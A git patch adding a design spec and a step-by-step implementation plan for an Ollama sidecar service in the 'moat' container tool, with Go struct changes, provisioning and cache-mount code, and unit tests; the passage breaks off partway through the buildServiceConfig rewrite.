From 24ee9556bab2fe1c4209df62232003b124fc8db8 Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 00:29:43 +0000 Subject: [PATCH 01/27] docs: add Ollama sidecar design spec and implementation plan Adds design spec for Ollama as a service dependency with generalized provisions/cache extensions, and a detailed implementation plan with 10 tasks covering registry, types, config, service manager, and docs. --- CLAUDE.md | 6 + .../plans/2026-03-17-ollama-sidecar-design.md | 217 ++++ docs/plans/2026-03-17-ollama-sidecar-plan.md | 1107 +++++++++++++++++ 3 files changed, 1330 insertions(+) create mode 100644 docs/plans/2026-03-17-ollama-sidecar-design.md create mode 100644 docs/plans/2026-03-17-ollama-sidecar-plan.md diff --git a/CLAUDE.md b/CLAUDE.md index 7a8ca104..efb6b98f 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -171,6 +171,12 @@ Documentation is part of the feature. A feature without docs is incomplete. - Scope is optional but encouraged (e.g., `feat(api): add user endpoint`) - Do not include `Co-Authored-By` lines for Claude in commit messages +## Design Specs & Plans + +- Store all design specs and implementation plans in `docs/plans/` +- Naming convention: `YYYY-MM-DD-<topic>-design.md` for specs, `YYYY-MM-DD-<topic>-plan.md` for plans +- Do not create `docs/superpowers/` or other directories for specs — `docs/plans/` is the single location + ## Creating Pull Requests - Use `gh pr create` with default flags only (no `--base`, `--head`, etc.) diff --git a/docs/plans/2026-03-17-ollama-sidecar-design.md b/docs/plans/2026-03-17-ollama-sidecar-design.md new file mode 100644 index 00000000..e9a00e25 --- /dev/null +++ b/docs/plans/2026-03-17-ollama-sidecar-design.md @@ -0,0 +1,217 @@ +# Ollama Sidecar Service + +## Summary + +Add Ollama as a service dependency, following the established postgres/mysql/redis pattern. An agent declares `ollama` in `dependencies:` and lists models under `services.ollama.models`. 
Moat starts an Ollama sidecar, pulls declared models, caches them on the host, and injects `MOAT_OLLAMA_*` environment variables into the agent container. + +## Motivation + +AI agents running inside moat containers may need access to local model inference — for embeddings, sub-tasks, code review, or other LLM calls — without requiring external API keys or network access to hosted inference services. + +## Design + +### User-facing config + +```yaml +# moat.yaml +name: my-agent + +dependencies: + - ollama@0.9 + +services: + ollama: + models: + - qwen2.5-coder:7b + - nomic-embed-text +``` + +The agent receives: + +```bash +MOAT_OLLAMA_HOST=ollama +MOAT_OLLAMA_PORT=11434 +MOAT_OLLAMA_URL=http://ollama:11434 +``` + +No password, user, or database — Ollama has no auth. + +### Registry entry + +```yaml +# registry.yaml +ollama: + description: Ollama local model server + type: service + default: "0.9" + service: + image: ollama/ollama + ports: + default: 11434 + env_prefix: OLLAMA + readiness_cmd: "ollama list" + url_scheme: "http" + url_format: "{scheme}://{host}:{port}" + cache_path: /root/.ollama + provisions_key: models + provision_cmd: "ollama pull {item}" +``` + +### Generalized service extensions + +Rather than adding Ollama-specific fields to `ServiceDef`, this design introduces two general-purpose concepts that any future service can use: + +**Provisions** — A pattern for "pull/load N things at startup": +- `provisions_key`: Names the key in user's `services.<name>` config (e.g., `models`). The config layer maps this to an explicit `Provisions []string` field on `ServiceSpec` during parsing. +- `provision_cmd`: Command template with `{item}` placeholder, executed once per item inside the sidecar + +**Cache** — Host-side persistence for service data: +- `cache_path`: Container path to mount. Host side is `~/.moat/cache/<service>/` + +These fields are optional. Existing services (postgres, mysql, redis) don't use them and are unaffected. 
+ +Note: this is a simple "pull N items" pattern. Services requiring more complex provisioning (ordered steps, dependencies between items, conditional logic) should use a different mechanism rather than extending these fields. + +### Struct changes + +**`ServiceDef`** (`internal/deps/types.go`): + +```go +type ServiceDef struct { + // ... existing fields ... + CachePath string `yaml:"cache_path,omitempty"` + ProvisionsKey string `yaml:"provisions_key,omitempty"` + ProvisionCmd string `yaml:"provision_cmd,omitempty"` +} +``` + +**`ServiceConfig`** (`internal/container/runtime.go`): + +```go +type ServiceConfig struct { + // ... existing fields ... + CachePath string // container-side path (e.g., /root/.ollama) + CacheHostPath string // host-side path (e.g., ~/.moat/cache/ollama/) + Provisions []string + ProvisionCmd string +} +``` + +`CacheHostPath` is resolved in `buildServiceConfig` (run layer), which has access to the moat home directory. Both paths are passed through so `buildSidecarConfig` can construct the bind mount. + +**`ServiceSpec`** (`internal/config/config.go`): + +```go +type ServiceSpec struct { + Env map[string]string `yaml:"env,omitempty"` + Wait *bool `yaml:"wait,omitempty"` + Provisions []string `yaml:"provisions,omitempty"` +} +``` + +`Provisions` is an explicit, typed field. The `config` package parses `ServiceSpec` with deferred handling for unknown keys (using `yaml.Node` or a raw map). The mapping from user-facing key (e.g., `models`) to `Provisions` happens in `buildServiceConfig` in the run layer (`internal/run/services.go`), which has access to both the registry's `provisions_key` and the parsed user spec. This avoids a package dependency from `config` → `deps`. Unknown keys that don't match the registry's `provisions_key` produce a validation error at this stage, catching typos like `model:` instead of `models:`. 
**`ServiceManager`** (`internal/container/runtime.go`) — add provisioning method: + +```go +type ServiceManager interface { + StartService(ctx context.Context, cfg ServiceConfig) (ServiceInfo, error) + CheckReady(ctx context.Context, info ServiceInfo) error + StopService(ctx context.Context, info ServiceInfo) error + SetNetworkID(id string) + ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error +} +``` + +`ProvisionService` executes commands sequentially inside the service container. This keeps provisioning within the `ServiceManager` abstraction rather than reaching through to `Runtime.Exec` from the run layer. Both `dockerServiceManager` and `appleServiceManager` implement it using their respective exec mechanisms. + +### Password generation guard + +The existing `buildServiceConfig` unconditionally generates a password. For services with no auth (like Ollama, where `password_env` is empty), this produces a phantom password env var. Fix: only generate a password when `spec.Service.PasswordEnv` is non-empty. This prevents spurious `MOAT_OLLAMA_PASSWORD` injection. + +### Cache volume mount + +- **Host path:** `~/.moat/cache/<service>/` (e.g., `~/.moat/cache/ollama/`) +- **Container path:** Value of `cache_path` (e.g., `/root/.ollama`) +- **Created:** `os.MkdirAll` before starting the sidecar +- **Wired in:** + - **Docker:** `buildSidecarConfig` adds a `MountConfig` to `SidecarConfig.Mounts` (already supported) + - **Apple:** `buildAppleRunArgs` needs new mount plumbing. The Apple container CLI supports `--mount type=bind,source=<src>,target=<dst>` but `buildAppleRunArgs` currently has no mount logic. This requires adding mount arg construction, similar to how the main Apple runtime handles mounts in `apple.go`. +- **Permissions:** The `ollama/ollama` image runs as root. The host cache directory is created with default permissions. On Docker this works (root in container = root or remapped UID on host). 
On Apple containers, ownership semantics should be tested during implementation. +- **Concurrency:** Ollama handles concurrent reads to its model cache. For concurrent pulls from parallel runs, use `flock`-based advisory locking on `~/.moat/cache/<service>/.lock` during the provision phase. The lock is held only during provisioning, not for the run lifetime. This is low effort and prevents potential cache corruption. +- **Assumption:** `cache_path` assumes the default Ollama model storage location (`/root/.ollama`). Custom Ollama images with different home directories would need to override this via the `services.ollama.env` mechanism (e.g., `OLLAMA_MODELS=/custom/path`). + +### Provisioning and readiness + +Two-phase readiness for services with provisions: + +1. **Phase 1 — Service healthy:** Poll `readiness_cmd` (`ollama list`) until success. Same `waitForServiceReady` loop (1s interval, 30s timeout). + +2. **Phase 2 — Provision items:** For each item in `Provisions`, call `ServiceManager.ProvisionService` which execs `provision_cmd` with `{item}` replaced inside the sidecar. Sequential execution to avoid overwhelming CPU/disk. + +**Failure semantics:** Fail-fast — abort the run on the first provision failure. Error message includes the failed command, its output, and a hint to check `moat logs <service>` for service container logs. + +**Timeouts:** +- Phase 1: Existing 30s readiness timeout +- Phase 2: Separate 30-minute provision timeout for the entire phase (model pulls can be GBs). This is a known limitation — if total pull time exceeds 30 minutes, the run fails. Users can work around this by pre-warming the cache with a smaller run first. The timeout is not user-configurable in this iteration. + +**Implementation:** New `provisionService` function in `internal/run/services.go`, called after `waitForServiceReady`. Builds command list from `ServiceConfig.Provisions` and `ServiceConfig.ProvisionCmd`, then calls `ServiceManager.ProvisionService`. 
Hooks into `manager.go` in the service readiness loop, right after `waitForServiceReady` returns and before env injection. + +**Cache hits:** If a model is already cached from a previous run, `ollama pull` returns near-instantly ("model already exists"). The provision command always runs; caching makes it fast. + +**User feedback:** Provision exec stdout/stderr streams raw to the user's stderr (not through `ui.Info` which adds prefixes). This is appropriate for long-running download progress bars. It is the first time the service startup path produces streaming user-visible output — existing service startups are silent. + +**`wait: false` interaction:** When a user sets `wait: false` on a service, both readiness polling and provisioning are skipped. This is consistent — `wait: false` means "do not block on this service." The agent must handle model availability itself. + +**Command execution:** Provision commands are executed via `sh -c ` inside the service container, matching the existing readiness check pattern in `CheckReady`. + +### Lifecycle + +Follows existing service lifecycle exactly: + +1. Parse dependencies, identify Ollama as a service +2. Create Docker network +3. Pull `ollama/ollama:0.9` image +4. Start Ollama sidecar with cache volume mounted +5. Phase 1: Wait for Ollama HTTP server (readiness check) +6. Phase 2: Pull each declared model (provision step) +7. Inject `MOAT_OLLAMA_*` environment variables +8. Start agent container + +Shutdown: same as other services — force-remove sidecar. Cache persists on host. + +### Constraints + +- **CPU only.** No GPU passthrough in this implementation. GPU support (Docker `--gpus`, Apple Metal) is a clean follow-up — the config shape doesn't need to change. +- **Ephemeral sidecar, persistent cache.** The Ollama process is destroyed with the run. The model cache survives across runs. 
+ +### Future work + +- **GPU passthrough** — Docker `--gpus all` (NVIDIA Container Toolkit), Apple Metal (automatic on Apple containers) +- **Cache cleanup** — `moat clean --cache` to reclaim disk from `~/.moat/cache/`. Model caches can grow to tens of GB without a cleanup mechanism. +- **Provision timeout configuration** — User-configurable timeout in `moat.yaml` for services with large provisioning steps. +- **Configurable cache path** — Allow overriding `cache_path` via `services.ollama.env` with `OLLAMA_MODELS` for custom Ollama images. + +## Files changed + +| File | Change | +|------|--------| +| `internal/deps/registry.yaml` | Add `ollama` service entry with `cache_path`, `provisions_key`, `provision_cmd` | +| `internal/deps/types.go` | Add `CachePath`, `ProvisionsKey`, `ProvisionCmd` to `ServiceDef` | +| `internal/container/runtime.go` | Add `CachePath`, `Provisions`, `ProvisionCmd` to `ServiceConfig`; add `ProvisionService` to `ServiceManager` interface | +| `internal/config/config.go` | Add `Provisions` field to `ServiceSpec`, deferred unknown-key handling in `UnmarshalYAML` | +| `internal/run/services.go` | Add `provisionService` function, populate new `ServiceConfig` fields in `buildServiceConfig`, wire cache path, guard password generation | +| `internal/container/docker_service.go` | Implement `ProvisionService`, mount cache volume in `buildSidecarConfig` | +| `internal/container/apple_service.go` | Implement `ProvisionService`, add mount support to `buildAppleRunArgs` | +| `internal/container/service_helpers.go` | No changes expected | +| `examples/service-ollama/moat.yaml` | New example | +| `examples/service-ollama/demo.sh` | New example | +| `docs/content/guides/08-services.md` | Add Ollama section | +| `docs/content/reference/06-dependencies.md` | Add Ollama to registry table | +| `docs/content/reference/02-moat-yaml.md` | Document `services.<name>.<key>` pattern | + +## Testing + +- **Unit tests:** `buildServiceConfig` with Ollama spec, `ServiceSpec` 
custom unmarshaling (valid key, typo key, missing key), `provisionService` with mock `ServiceManager`, password generation guard for no-auth services +- **Integration test:** `internal/e2e/services_test.go` — start Ollama sidecar, verify env vars injected, verify model accessible via API +- **Manual test:** `moat run examples/service-ollama` — should print model list and generate a response diff --git a/docs/plans/2026-03-17-ollama-sidecar-plan.md b/docs/plans/2026-03-17-ollama-sidecar-plan.md new file mode 100644 index 00000000..0812a056 --- /dev/null +++ b/docs/plans/2026-03-17-ollama-sidecar-plan.md @@ -0,0 +1,1107 @@ +# Ollama Sidecar Service Implementation Plan + +> **For agentic workers:** REQUIRED: Use superpowers:subagent-driven-development (if subagents available) or superpowers:executing-plans to implement this plan. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Add Ollama as a service dependency with model provisioning and host-side caching, following the existing postgres/mysql/redis sidecar pattern. + +**Architecture:** Extend the service dependency system with two general-purpose concepts — provisions (pull N items at startup) and cache (host-side persistence). Ollama is the first consumer. The registry entry, config parsing, service manager interface, and both Docker/Apple implementations are all modified. 
+ +**Tech Stack:** Go, Docker API, Apple container CLI, YAML parsing + +**Spec:** `docs/plans/2026-03-17-ollama-sidecar-design.md` + +--- + +## Chunk 1: Registry and type changes + +### Task 1: Add provision/cache fields to ServiceDef + +**Files:** +- Modify: `internal/deps/types.go:106-119` (ServiceDef struct) + +- [ ] **Step 1: Write the failing test** + +Add to `internal/deps/registry_test.go`: + +```go +func TestRegistryHasOllama(t *testing.T) { + ollama, ok := GetSpec("ollama") + if !ok { + t.Fatal("Registry should have 'ollama'") + } + if ollama.Type != TypeService { + t.Errorf("ollama.Type = %v, want %v", ollama.Type, TypeService) + } + if ollama.Service == nil { + t.Fatal("ollama.Service should not be nil") + } + assert.Equal(t, "ollama/ollama", ollama.Service.Image) + assert.Equal(t, 11434, ollama.Service.Ports["default"]) + assert.Equal(t, "OLLAMA", ollama.Service.EnvPrefix) + assert.Equal(t, "/root/.ollama", ollama.Service.CachePath) + assert.Equal(t, "models", ollama.Service.ProvisionsKey) + assert.Equal(t, "ollama pull {item}", ollama.Service.ProvisionCmd) + assert.Empty(t, ollama.Service.PasswordEnv) +} +``` + +- [ ] **Step 2: Run test to verify it fails** + +Run: `go test ./internal/deps/ -run TestRegistryHasOllama -v` +Expected: FAIL — ollama not found in registry, and `CachePath`/`ProvisionsKey`/`ProvisionCmd` fields don't exist on `ServiceDef`. + +- [ ] **Step 3: Add fields to ServiceDef** + +In `internal/deps/types.go`, add three fields to `ServiceDef` after the `URLFormat` field: + +```go + // CachePath is the container-side path to mount for host-side caching. + // If set, ~/.moat/cache// is bind-mounted here. + // This allows data to persist across runs (e.g., downloaded models). + CachePath string `yaml:"cache_path,omitempty"` + + // ProvisionsKey names the key in user's services. config that contains + // a list of items to provision (e.g., "models"). Used with ProvisionCmd. 
+ ProvisionsKey string `yaml:"provisions_key,omitempty"` + + // ProvisionCmd is a command template executed once per provision item. + // The placeholder {item} is replaced with each item value. + // Commands run via sh -c inside the service container after readiness. + ProvisionCmd string `yaml:"provision_cmd,omitempty"` +``` + +- [ ] **Step 4: Add ollama entry to registry.yaml** + +Add to `internal/deps/registry.yaml` in the "Service dependencies" section, after redis: + +```yaml +ollama: + description: Ollama local model server + type: service + default: "0.9" + service: + image: ollama/ollama + ports: + default: 11434 + env_prefix: OLLAMA + readiness_cmd: "ollama list" + url_scheme: "http" + url_format: "{scheme}://{host}:{port}" + cache_path: /root/.ollama + provisions_key: models + provision_cmd: "ollama pull {item}" +``` + +- [ ] **Step 5: Run test to verify it passes** + +Run: `go test ./internal/deps/ -run TestRegistryHasOllama -v` +Expected: PASS + +- [ ] **Step 6: Run all deps tests** + +Run: `go test ./internal/deps/ -v -count=1` +Expected: All PASS + +- [ ] **Step 7: Commit** + +```bash +git add internal/deps/types.go internal/deps/registry.yaml internal/deps/registry_test.go +git commit -m "feat(deps): add ollama service and provision/cache fields to ServiceDef" +``` + +--- + +### Task 2: Add provision/cache fields to ServiceConfig + +**Files:** +- Modify: `internal/container/runtime.go:209-221` (ServiceConfig struct) + +- [ ] **Step 1: Add fields to ServiceConfig** + +In `internal/container/runtime.go`, add four fields to `ServiceConfig` after `ReadinessCmd`: + +```go + // CachePath is the container-side path for cache mounting (e.g., "/root/.ollama"). + CachePath string + // CacheHostPath is the resolved host-side path (e.g., "~/.moat/cache/ollama/"). + CacheHostPath string + // Provisions is the list of items to provision (e.g., model names). + Provisions []string + // ProvisionCmd is the command template with {item} placeholder. 
+ ProvisionCmd string +``` + +- [ ] **Step 2: Verify compilation** + +Run: `go build ./internal/container/...` +Expected: Success + +- [ ] **Step 3: Commit** + +```bash +git add internal/container/runtime.go +git commit -m "feat(container): add provision and cache fields to ServiceConfig" +``` + +--- + +### Task 3: Add ProvisionService to ServiceManager interface + +**Files:** +- Modify: `internal/container/runtime.go:199-206` (ServiceManager interface) +- Modify: `internal/container/docker_service.go` (add method) +- Modify: `internal/container/apple_service.go` (add method) +- Modify: `internal/container/docker_service_test.go` (add test) +- Modify: `internal/container/apple_service_test.go` (add test) + +- [ ] **Step 1: Write failing tests** + +Add to `internal/container/docker_service_test.go`: + +```go +func TestBuildSidecarConfigWithCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Ports: map[string]int{"default": 11434}, + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-789") + assert.Equal(t, "ollama/ollama:0.9", sidecarCfg.Image) + assert.Equal(t, "moat-ollama-test-run-789", sidecarCfg.Name) + + // Verify cache mount is present + require.Len(t, sidecarCfg.Mounts, 1) + assert.Equal(t, "/tmp/test-cache/ollama", sidecarCfg.Mounts[0].Source) + assert.Equal(t, "/root/.ollama", sidecarCfg.Mounts[0].Target) + assert.False(t, sidecarCfg.Mounts[0].ReadOnly) +} + +func TestBuildSidecarConfigNoCachePath(t *testing.T) { + cfg := ServiceConfig{ + Name: "postgres", + Version: "17", + Image: "postgres", + Env: map[string]string{}, + RunID: "test-run-000", + } + + sidecarCfg := buildSidecarConfig(cfg, "net-000") + assert.Empty(t, sidecarCfg.Mounts) +} +``` + +Add to `internal/container/apple_service_test.go`: + +```go +func TestAppleBuildRunArgsWithCachePath(t *testing.T) { + cfg := 
ServiceConfig{ + Name: "ollama", + Version: "0.9", + Image: "ollama/ollama", + Env: map[string]string{}, + RunID: "test-run-789", + CachePath: "/root/.ollama", + CacheHostPath: "/tmp/test-cache/ollama", + } + + args := buildAppleRunArgs(cfg, "moat-test-net") + assert.Contains(t, args, "--volume") + // Find the volume arg value + for i, a := range args { + if a == "--volume" && i+1 < len(args) { + assert.Equal(t, "/tmp/test-cache/ollama:/root/.ollama", args[i+1]) + return + } + } + t.Fatal("--volume flag not found in args") +} +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `go test ./internal/container/ -run "TestBuildSidecarConfigWithCachePath|TestBuildSidecarConfigNoCachePath|TestAppleBuildRunArgsWithCachePath" -v` +Expected: FAIL — cache mount not implemented + +- [ ] **Step 3: Add ProvisionService to ServiceManager interface** + +In `internal/container/runtime.go`, add to `ServiceManager` interface: + +```go + // ProvisionService executes commands sequentially inside the service container. + // Each command is run via sh -c. stdout receives streaming output for user feedback. + // Returns on first command failure (fail-fast). + ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error +``` + +- [ ] **Step 4: Add cache mount to Docker buildSidecarConfig** + +In `internal/container/docker_service.go`, in `buildSidecarConfig`, add after the `SidecarConfig` struct literal is built (before `if len(cfg.ExtraCmd) > 0`): + +```go + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + sc.Mounts = append(sc.Mounts, MountConfig{ + Source: cfg.CacheHostPath, + Target: cfg.CachePath, + }) + } +``` + +- [ ] **Step 5: Implement ProvisionService on dockerServiceManager** + +Add `"github.com/docker/docker/pkg/stdcopy"` to imports. Then add to `internal/container/docker_service.go`: + +```go +// ProvisionService executes commands sequentially inside the service container. 
+func (m *dockerServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCreateResp, err := m.cli.ContainerExecCreate(ctx, info.ID, dockercontainer.ExecOptions{ + Cmd: []string{"sh", "-c", cmd}, + AttachStdout: true, + AttachStderr: true, + }) + if err != nil { + return fmt.Errorf("creating exec for provision command %q: %w", cmd, err) + } + + resp, err := m.cli.ContainerExecAttach(ctx, execCreateResp.ID, dockercontainer.ExecAttachOptions{}) + if err != nil { + return fmt.Errorf("attaching to provision command %q: %w", cmd, err) + } + // Use stdcopy to demultiplex Docker's stream protocol headers. + // Without this, binary framing bytes would be mixed into the output. + _, _ = stdcopy.StdCopy(stdout, stdout, resp.Reader) + resp.Close() + + execInspect, err := m.cli.ContainerExecInspect(ctx, execCreateResp.ID) + if err != nil { + return fmt.Errorf("inspecting provision command %q: %w", cmd, err) + } + if execInspect.ExitCode != 0 { + return fmt.Errorf("provision command %q failed with exit code %d", cmd, execInspect.ExitCode) + } + } + return nil +} +``` + +- [ ] **Step 6: Add cache mount to Apple buildAppleRunArgs** + +In `internal/container/apple_service.go`, in `buildAppleRunArgs`, add after the network block and before env sorting: + +```go + // Add cache mount if configured + if cfg.CachePath != "" && cfg.CacheHostPath != "" { + args = append(args, "--volume", cfg.CacheHostPath+":"+cfg.CachePath) + } +``` + +- [ ] **Step 7: Implement ProvisionService on appleServiceManager** + +Add to `internal/container/apple_service.go`: + +```go +// ProvisionService executes commands sequentially inside the service container. 
+func (m *appleServiceManager) ProvisionService(ctx context.Context, info ServiceInfo, cmds []string, stdout io.Writer) error { + for _, cmd := range cmds { + execCmd := exec.CommandContext(ctx, m.containerBin, "exec", info.ID, "sh", "-c", cmd) + execCmd.Stdout = stdout + execCmd.Stderr = stdout + if err := execCmd.Run(); err != nil { + return fmt.Errorf("provision command %q failed: %w", cmd, err) + } + } + return nil +} +``` + +- [ ] **Step 8: Run tests to verify they pass** + +Run: `go test ./internal/container/ -run "TestBuildSidecarConfigWithCachePath|TestBuildSidecarConfigNoCachePath|TestAppleBuildRunArgsWithCachePath" -v` +Expected: PASS + +- [ ] **Step 9: Run all container tests** + +Run: `go test ./internal/container/ -v -count=1` +Expected: All PASS + +- [ ] **Step 10: Commit** + +```bash +git add internal/container/runtime.go internal/container/docker_service.go internal/container/apple_service.go internal/container/docker_service_test.go internal/container/apple_service_test.go +git commit -m "feat(container): add ProvisionService and cache mount support to service managers" +``` + +--- + +## Chunk 2: Config parsing and service orchestration + +### Task 4: Add Provisions field to ServiceSpec with deferred unknown-key handling + +**Files:** +- Modify: `internal/config/config.go:150-163` (ServiceSpec struct) +- Modify: `internal/config/config_test.go` (add tests) + +- [ ] **Step 1: Write failing tests** + +Add to `internal/config/config_test.go`: + +```go +func TestServiceSpecUnmarshalWithExtra(t *testing.T) { + input := ` +env: + FOO: bar +wait: false +models: + - qwen2.5-coder:7b + - nomic-embed-text +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "bar", spec.Env["FOO"]) + assert.False(t, spec.ServiceWait()) + assert.Equal(t, []string{"qwen2.5-coder:7b", "nomic-embed-text"}, spec.Extra["models"]) +} + +func TestServiceSpecUnmarshalNoExtra(t *testing.T) { + input := ` +env: + 
POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) + assert.Empty(t, spec.Extra) +} + +func TestServiceSpecUnmarshalPreservesImage(t *testing.T) { + input := ` +image: custom-postgres:17 +env: + POSTGRES_DB: myapp +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Equal(t, "custom-postgres:17", spec.Image) + assert.Equal(t, "myapp", spec.Env["POSTGRES_DB"]) +} + +func TestServiceSpecUnmarshalEmptyExtra(t *testing.T) { + input := ` +env: + FOO: bar +models: [] +` + var spec ServiceSpec + err := yaml.Unmarshal([]byte(input), &spec) + require.NoError(t, err) + assert.Empty(t, spec.Extra["models"]) +} +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `go test ./internal/config/ -run "TestServiceSpecUnmarshal" -v` +Expected: FAIL — `Extra` field doesn't exist on `ServiceSpec` + +- [ ] **Step 3: Implement ServiceSpec changes** + +In `internal/config/config.go`, replace the `ServiceSpec` struct and add `UnmarshalYAML`: + +```go +// ServiceSpec allows customizing service behavior. +type ServiceSpec struct { + Env map[string]string `yaml:"env,omitempty"` + Image string `yaml:"image,omitempty"` + Wait *bool `yaml:"wait,omitempty"` + // Extra holds unknown list-valued keys (e.g., "models" for ollama). + // Populated by UnmarshalYAML. The run layer maps these to provisions + // using the registry's provisions_key. + Extra map[string][]string `yaml:"-"` +} + +// UnmarshalYAML implements custom unmarshaling to capture unknown list-valued keys +// into Extra. Known keys (env, image, wait) are parsed normally. +func (s *ServiceSpec) UnmarshalYAML(value *yaml.Node) error { + // First, decode known fields using an alias to avoid recursion. + type plain ServiceSpec + if err := value.Decode((*plain)(s)); err != nil { + return err + } + + // Then scan for unknown keys that have sequence values. 
+ if value.Kind != yaml.MappingNode { + return nil + } + known := map[string]bool{"env": true, "image": true, "wait": true} + for i := 0; i+1 < len(value.Content); i += 2 { + key := value.Content[i].Value + val := value.Content[i+1] + if known[key] { + continue + } + if val.Kind == yaml.SequenceNode { + items := make([]string, 0, len(val.Content)) + for _, item := range val.Content { + items = append(items, item.Value) + } + if s.Extra == nil { + s.Extra = make(map[string][]string) + } + s.Extra[key] = items + } + } + return nil +} +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `go test ./internal/config/ -run "TestServiceSpecUnmarshal" -v` +Expected: PASS + +- [ ] **Step 5: Run all config tests** + +Run: `go test ./internal/config/ -v -count=1` +Expected: All PASS + +- [ ] **Step 6: Commit** + +```bash +git add internal/config/config.go internal/config/config_test.go +git commit -m "feat(config): add Extra field to ServiceSpec for provision lists" +``` + +--- + +### Task 5: Update buildServiceConfig for provisions, cache, and password guard + +**Files:** +- Modify: `internal/run/services.go:101-175` +- Modify: `internal/run/services_test.go` + +- [ ] **Step 1: Write failing tests** + +Add to `internal/run/services_test.go`: + +```go +func TestBuildServiceConfigOllama(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": {"qwen2.5-coder:7b", "nomic-embed-text"}, + }, + } + + cfg, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.NoError(t, err) + + assert.Equal(t, "ollama", cfg.Name) + assert.Equal(t, "0.9", cfg.Version) + assert.Equal(t, "ollama/ollama", cfg.Image) + assert.Equal(t, 11434, cfg.Ports["default"]) + assert.Equal(t, "/root/.ollama", cfg.CachePath) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) + assert.Equal(t, []string{"qwen2.5-coder:7b", "nomic-embed-text"}, cfg.Provisions) + + // Ollama 
has no auth — no password should be set + assert.Empty(t, cfg.Env) + assert.Empty(t, cfg.PasswordEnv) +} + +func TestBuildServiceConfigOllamaNoModels(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-ollama", nil) + require.NoError(t, err) + + assert.Empty(t, cfg.Provisions) + assert.Equal(t, "ollama pull {item}", cfg.ProvisionCmd) +} + +func TestBuildServiceConfigNoPasswordForNoAuth(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-test", nil) + require.NoError(t, err) + + // No password env var should be set when PasswordEnv is empty + _, hasPassword := cfg.Env["password"] + assert.False(t, hasPassword, "should not set phantom password for no-auth services") +} + +func TestBuildServiceConfigPostgresStillHasPassword(t *testing.T) { + dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} + + cfg, err := buildServiceConfig(dep, "run-pg", nil) + require.NoError(t, err) + + assert.NotEmpty(t, cfg.Env["POSTGRES_PASSWORD"], "postgres should still get a password") +} + +func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "model": {"qwen2.5-coder:7b"}, // typo: "model" instead of "models" + }, + } + + _, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "model") +} +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `go test ./internal/run/ -run "TestBuildServiceConfigOllama|TestBuildServiceConfigNoPassword|TestBuildServiceConfigPostgresStillHas|TestBuildServiceConfigValidatesProvisionsKey" -v` +Expected: FAIL + +- [ ] **Step 3: Update buildServiceConfig** + +Replace `buildServiceConfig` in `internal/run/services.go`: + +```go +// 
buildServiceConfig creates a ServiceConfig for a service dependency. +// Populates both generic fields and service definition fields from the registry. +func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.ServiceSpec) (container.ServiceConfig, error) { + spec, ok := deps.GetSpec(dep.Name) + if !ok || spec.Service == nil { + return container.ServiceConfig{}, fmt.Errorf("unknown service: %s", dep.Name) + } + if spec.Type != deps.TypeService { + return container.ServiceConfig{}, fmt.Errorf("%s has type %q but expected %q", dep.Name, spec.Type, deps.TypeService) + } + + env := make(map[string]string) + + // Only generate password for services that have auth + if spec.Service.PasswordEnv != "" { + password, err := generatePassword() + if err != nil { + return container.ServiceConfig{}, err + } + env[spec.Service.PasswordEnv] = password + + // Set extra_env from registry with placeholder substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + v = strings.ReplaceAll(v, "{password}", password) + env[k] = v + } + } else { + // No auth — still apply extra_env without password substitution + for k, v := range spec.Service.ExtraEnv { + v = strings.ReplaceAll(v, "{db}", spec.Service.DefaultDB) + env[k] = v + } + } + + // Apply user overrides + if userSpec != nil { + for k, v := range userSpec.Env { + env[k] = v + } + } + + // Resolve provisions from user spec Extra using registry's provisions_key + var provisions []string + if userSpec != nil && spec.Service.ProvisionsKey != "" { + provisions = userSpec.Extra[spec.Service.ProvisionsKey] + + // Validate: reject unknown Extra keys that don't match provisions_key + for key := range userSpec.Extra { + if key != spec.Service.ProvisionsKey { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s is not a valid key (did you mean %q?)", + dep.Name, key, spec.Service.ProvisionsKey, + ) + } + } + } else if userSpec != nil && 
